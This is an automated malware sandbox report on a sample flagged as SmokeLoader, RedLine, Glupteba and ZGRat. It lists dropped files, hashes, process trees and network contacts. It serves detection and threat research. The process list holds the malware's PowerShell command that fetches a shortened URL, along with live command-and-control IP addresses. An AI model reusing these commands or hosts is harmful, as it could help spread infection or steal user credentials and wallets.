Analysis Overview
SHA256
2b3edccf5deb78e43bf9267a60f85b096b25f15cf6bd1c83c56404d7fe0e7dda
Threat Level: Known bad
The file 0x00310000000142c9-42.dat was found to be: Known bad.
Malicious Activity Summary
Glupteba payload
SmokeLoader
RedLine payload
ZGRat
Detect ZGRat V1
Smokeloader family
Glupteba
RedLine
Downloads MZ/PE file
Reads user/profile data of web browsers
Loads dropped DLL
Deletes itself
Executes dropped EXE
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Unsigned PE
Suspicious behavior: MapViewOfSection
Checks SCSI registry key(s)
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-18 22:25
Signatures
Smokeloader family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-18 22:25
Reported
2023-12-18 22:27
Platform
win7-20231215-en
Max time kernel
34s
Max time network
41s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SmokeLoader
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9E23.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C0A2.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1260 wrote to memory of 2796 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9E23.exe |
| PID 1260 wrote to memory of 2796 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9E23.exe |
| PID 1260 wrote to memory of 2796 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9E23.exe |
| PID 1260 wrote to memory of 2796 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9E23.exe |
| PID 1260 wrote to memory of 1680 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C0A2.exe |
| PID 1260 wrote to memory of 1680 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C0A2.exe |
| PID 1260 wrote to memory of 1680 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C0A2.exe |
| PID 1260 wrote to memory of 1680 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C0A2.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe
"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"
C:\Users\Admin\AppData\Local\Temp\9E23.exe
C:\Users\Admin\AppData\Local\Temp\9E23.exe
C:\Users\Admin\AppData\Local\Temp\C0A2.exe
C:\Users\Admin\AppData\Local\Temp\C0A2.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| RU | 77.105.132.87:17066 | tcp | |
| DE | 140.82.121.3:443 | github.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
Files
memory/1220-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1220-2-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1260-1-0x0000000002990000-0x00000000029A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9E23.exe
| MD5 | 9a747219c8fab73e2ba0541e3d86cd8b |
| SHA1 | 0723a7c85108ebd6a8141a7ce2459c35add81a0c |
| SHA256 | eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01 |
| SHA512 | acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83 |
memory/2796-14-0x0000000000170000-0x00000000001C2000-memory.dmp
memory/2796-19-0x0000000074EB0000-0x000000007559E000-memory.dmp
memory/2796-20-0x0000000004FF0000-0x0000000005030000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\C0A2.exe
| MD5 | 8426cb86fd074a9fa24c7a03fb6ba83e |
| SHA1 | 0703f24aee9b972ee7f013d68e0bc6adf6815f2f |
| SHA256 | 4c31482f75d5235702a7e5524dc37650cf1501d76c362897cc381ecd4dd18f8b |
| SHA512 | 9aa69dc7d85cffcfed21447c327525cce8431e0a261cf72c0e54794725ebc2b9d8092d04d41ba38e8e8e99303a9e4ec8370d9921bea429b4567af41394ab5b67 |
C:\Users\Admin\AppData\Local\Temp\C0A2.exe
| MD5 | 8420b69596c39acf6dbb223d54cd0c63 |
| SHA1 | ff085bc696ecb71f0dd6a145789be36238c09079 |
| SHA256 | 5a1378f18b3ffb4d5bcb9c01920d76381edc7b8a73581129f9f0e7c19e4267ce |
| SHA512 | fcc88ddfe7baefb0a58fcb7fa34ea07340491f9b0a051e1ca9670130e9ec291879cc44a28562033bb8f24ac8f53aee8ce0c5bb42011002776da42110972ae9ca |
memory/1680-27-0x0000000074EB0000-0x000000007559E000-memory.dmp
memory/1680-28-0x0000000000D20000-0x0000000001B12000-memory.dmp
\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 0b4f47c84fea3289d10a7c8ee44e9a05 |
| SHA1 | 1dcee1baf50d19875fac2fe10c9be03cc56d14a3 |
| SHA256 | 46c923f681342628b916cd91c459a1ffb5ea616bc0d3a1cd534a25ef60058f1b |
| SHA512 | 93a587c9ed64d100085e70b4fffb4e853e87a7904b4a3b4e5a20b2f3dd8589db7efda3de70dead2eb88c45f115d4c6746d58acfaa8f4bbf6d24a9a0decea313c |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 93fd9db8463f1399af604b73f5b91f98 |
| SHA1 | fa74506d738165d8b393eddd9d4946658a0ce9d0 |
| SHA256 | 2db9f15147bc3d2c0eedfef29143bfb09a9252dade8f35ebc77ab4943a1b7b28 |
| SHA512 | 0a93a75cd22dc723764f6eb9a163311c2ff7b395e50ab2ceb4c60e07b04105456d754e5bcebc5650489691ea1d12e6057a493d307988b4b211ec5f536de0b3af |
\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 62b01ec4a955eab3a7a41e2c07f18913 |
| SHA1 | 48d8e1e391fa078d78e2130481f9d35eb45a11ec |
| SHA256 | c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56 |
| SHA512 | 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56 |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | da02cbbe2494696eab1d22b727df2568 |
| SHA1 | 000cf27825245f6808d338fa9166b79079802641 |
| SHA256 | 6037979e0cdf0b3f983483e00d964ee1a1d17075da3e313610254269ac186cbf |
| SHA512 | f687527f44303e01b6da681b8919e6dbd19dfcfdd2927314f0851952dbc7d21f4bdf4fbea69e0f88d8c84c06b87c55b1612588166c59319562ab80ed819a850b |
\Users\Admin\AppData\Local\Temp\nsoCACF.tmp\Math.dll
| MD5 | ebd8a7a5042ae1d4ce1aa9071859c851 |
| SHA1 | ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6 |
| SHA256 | fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837 |
| SHA512 | daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e |
memory/2668-58-0x0000000002560000-0x0000000002958000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 628ed1cb74d466586abe2c07dd9054ca |
| SHA1 | f579b31bb48ef7b1f900d3e024808af152212569 |
| SHA256 | e5cef7f1f342e2cd37533d13a33116f19b646b1264ac0f1bcf8ebf7d3383ee27 |
| SHA512 | fd95edafc0f78724dd3b1312adef01c59a487df238f431351e8acaff0d8ca4af8563ecee1aec7487d67ec77bf138e90d8878170e8453e268fd50032f81939dd6 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | bba2971c6aa2f5185c334e0600ddbb8f |
| SHA1 | 154dbd64a6fc433bfb28d8fa4cbd7d7e295f9a5e |
| SHA256 | ef63f4971cda8b49df48e66af3c374fd2878f81ad5b2f4f24d0c85b0e294bd0e |
| SHA512 | a465675bac51bc6848093017dc439991ad7d7280787770a5d7cabe96f3a216fb85c53bc9ffb87733cd2cff11f059da4e339aea97b5c3953b1c6a0cab2eb9122d |
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 9be9673496e2c450154568b60d2e5db4 |
| SHA1 | 453eddc50ed7d3c7dbad8d7f88c3cb0f977d41a2 |
| SHA256 | ea0cdeb898250d7ce38bfe22e88dc247f428726ce870fd6ad37cd313cdde3e54 |
| SHA512 | a7a8176633b2ab837cae379bac6e7b5481fb24554b989d2c06503babaa896f65acb18500dd93408e6d08d95e215ca790c4dfba19c8a09eb36ce8c01b97d3da8a |
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 81df7fc6a5f25fdb9cd4e20359e4375d |
| SHA1 | 8adbd2cd7b0d8ba270ffb02ff4161887e19d9689 |
| SHA256 | b1f679a0eb94145ce8e752a5a39123e1cdc01528ecd11d2eecdf7efd7d704c41 |
| SHA512 | 76c5a264203e898b84152d0ea4334e95cf576661ed98d92d6293d919a76e73ca0b7dc6f7bafc3081c23f3d585b205cbb1aaa7d7b2f3f293801c9183e90155eb9 |
\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 52c0b1e179b7a02c3994a1906f9dcb2c |
| SHA1 | 7cb6945491fe0dc3d9a0733fd2fb460fd5829caa |
| SHA256 | 5ad4bbace04417d727f5ad9e391f6448d1a48a10b8d9a8c203ad09bc5197e610 |
| SHA512 | 4b1b53baf326e91cb5e7ec290b0ba81681c9f7a3106c34e571c93997a82dd8e68b9cacfbc2ff9493b4bcbc025a45613f35a756cc3cb6622dff288972d3b4afa4 |
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 9193ff317000ba1603345d92a1a8fbbd |
| SHA1 | 3e8c626c9439054b4e0c637a22605d10d497abb4 |
| SHA256 | aa0bce4669b5390242740bc7fcbb8e9c53a7f3e6c158bb0e4fa2dbb8049d35f2 |
| SHA512 | fbb673e035e888ff1170b767e7f031feb4cf66634af10ec8f65c499c48ca3087dc3996eeda68920fa94458b8d3d3e1562128b37f1fa1d6c70bf5acd228ff5bc5 |
memory/1876-69-0x0000000000400000-0x0000000000418000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 4bebcc80c4f2920e5e7252492b38c140 |
| SHA1 | 4bcae052db639d6996b886d732965acc82f878d7 |
| SHA256 | 38610902e0ba8bddeca6b0be96c1cb10659fbafd3079ff6863194c17ca1b2a15 |
| SHA512 | 89e2cf8118169b342485c241447e87492c015f14f2a596c648d77e36a96f517bb91172acf4d63a5925d4e455d5b1cd81382a9f3e036c234d5b2dfb423d59638f |
memory/1680-72-0x0000000074EB0000-0x000000007559E000-memory.dmp
\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | 0a90f231fcfede6e071cfa5e88b244f7 |
| SHA1 | 161954936f6bef19c895d6798a9ebc1e36eb8d5f |
| SHA256 | 79ea00cd8c63517f97df7948f4ecd1ee2a9b675d3e5af787ee27fab78abe576e |
| SHA512 | 0f9ce57279ce81200514c843038b640c4a2138badf12a57651360a906dab9f3ee4c6e3b4473a2eebc4e819db587ef217fd49d5871d1607f8609e8b1942d7c171 |
\Users\Admin\AppData\Local\Temp\nsoCACF.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-18 22:25
Reported
2023-12-18 22:27
Platform
win10v2004-20231215-en
Max time kernel
56s
Max time network
117s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
ZGRat
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F7ED.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\933.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\933.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1608 set thread context of 1356 | N/A | C:\Users\Admin\AppData\Local\Temp\933.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\F7ED.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe
"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"
C:\Users\Admin\AppData\Local\Temp\F7ED.exe
C:\Users\Admin\AppData\Local\Temp\F7ED.exe
C:\Users\Admin\AppData\Local\Temp\933.exe
C:\Users\Admin\AppData\Local\Temp\933.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Users\Admin\AppData\Local\Temp\4071.exe
C:\Users\Admin\AppData\Local\Temp\4071.exe
C:\Users\Admin\AppData\Local\Temp\4CB7.exe
C:\Users\Admin\AppData\Local\Temp\4CB7.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c install.bat
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\is-E9HMQ.tmp\tuc3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-E9HMQ.tmp\tuc3.tmp" /SL5="$200022,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"
C:\Users\Admin\AppData\Local\Temp\7474.exe
C:\Users\Admin\AppData\Local\Temp\7474.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | 68.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.216.114.251:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.114.216.52.in-addr.arpa | udp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| US | 8.8.8.8:53 | 125.65.42.5.in-addr.arpa | udp |
| RU | 77.105.132.87:17066 | tcp | |
| US | 8.8.8.8:53 | 87.132.105.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 3.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| N/A | 195.20.16.103:18305 | tcp | |
| US | 8.8.8.8:53 | 103.16.20.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.237.62.212:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 212.62.237.104.in-addr.arpa | udp |
| BG | 91.92.254.7:80 | 91.92.254.7 | tcp |
Files
memory/4572-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/3552-1-0x00000000028F0000-0x0000000002906000-memory.dmp
memory/4572-2-0x0000000000400000-0x000000000040A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\F7ED.exe
| MD5 | 9a747219c8fab73e2ba0541e3d86cd8b |
| SHA1 | 0723a7c85108ebd6a8141a7ce2459c35add81a0c |
| SHA256 | eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01 |
| SHA512 | acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83 |
memory/1832-12-0x0000000000A80000-0x0000000000AD2000-memory.dmp
memory/1832-17-0x0000000075180000-0x0000000075930000-memory.dmp
memory/1832-18-0x0000000005760000-0x0000000005D04000-memory.dmp
memory/1832-19-0x00000000051B0000-0x0000000005242000-memory.dmp
memory/1832-20-0x0000000005110000-0x0000000005120000-memory.dmp
memory/1832-22-0x0000000005340000-0x000000000534A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\933.exe
| MD5 | 1713300ba962c869477e37e4b31e40af |
| SHA1 | d5c4835bc910acccd28dbed0c451043ea8de95ef |
| SHA256 | 2bcdb7a75707f841615be19f4bbcb95fc6b16ce19fb7ea782c5ff43ea1be024d |
| SHA512 | 70b2a2b17c6b3a0a295baf536451ef38c6e9e292a3c967a9fc950a6de321bbac0dc45e942ef151ba81b717f8ede3166388e68ce75f2afff0ec16aea98ea742e1 |
C:\Users\Admin\AppData\Local\Temp\933.exe
| MD5 | 068690aedee04ddb02bfe5d5eadd2892 |
| SHA1 | 5c84769fe148af03bce4acb9ce95da2f089b810f |
| SHA256 | b376c42b8254e7851c0afb17bdfd169b5f7a46ca0bcb7b133a985ee979b68096 |
| SHA512 | 0a23833e7d0d41f60b582b00e80fe1431690446e6bec01ce6b812ae59f92b65e03d36ddb12e4b9184d8e9121b902f08d2a727d86e05a7e5a99aa08509b31de24 |
memory/1608-26-0x0000000075180000-0x0000000075930000-memory.dmp
memory/1608-27-0x0000000000FE0000-0x000000000147E000-memory.dmp
